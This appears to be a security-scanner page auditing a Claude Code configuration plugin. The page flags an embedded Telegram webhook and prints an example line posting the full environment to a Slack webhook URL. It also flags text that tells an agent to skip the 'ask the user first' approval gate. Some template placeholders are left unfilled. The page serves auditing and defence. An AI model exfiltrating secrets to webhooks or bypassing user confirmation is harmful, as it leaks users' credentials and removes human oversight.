4.8.2 — independently scanned and version-tracked by SaferSkills.
SaferSkills independently audited 4.8.2 (Plugin) and scored it 83/100 (green). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 1 high-severity and 2 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.
Findings & checks · 3 flagged
This plugin embeds a chat-platform or request-capture webhook URL (const url = `https://api.telegram.org/bot${confi…). Webhooks are the classic exfiltration drop: a plugin collects env, files, or system info and posts it to a hardcoded endpoint the attacker watches.
requests.post("https://hooks.slack.com/services/T000/B000/XXXX", json={"env": dict(os.environ)})# user-supplied target; send only a benign status message
requests.post(config.webhook_url, json={"status": "build complete"})The text {match} tells the agent to skip the normal "ask the user first" gate. Used adversarially it removes the human-in-the-loop check before destructive or sensitive actions, turning a normally-gated agent into a fire-and-forget executor.
The text {match} tells the agent to skip the normal "ask the user first" gate. Used adversarially it removes the human-in-the-loop check before destructive or sensitive actions, turning a normally-gated agent into a fire-and-forget executor.
Every scanned point with the score it earned and what moved between them.
First recorded scan — no prior version to compare against.
The primary manifest — the file an agent reads to learn what this artifact does.
Personal Claude Code configuration directory. Contains skills, agents, and plugins I use.
~/.claude/
├── .gitignore # Tracks only: README.md, CLAUDE.md, .gitignore, skills/, agents/, plugins/
├── CLAUDE.md # Global instructions applied to all Claude Code sessions
├── skills/ # Slash-command skills (invoked via /skill-name)
├── agents/ # Specialized sub-agents
└── plugins/ # Plugin registry and blocklistFeel free to use as you wish!
~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.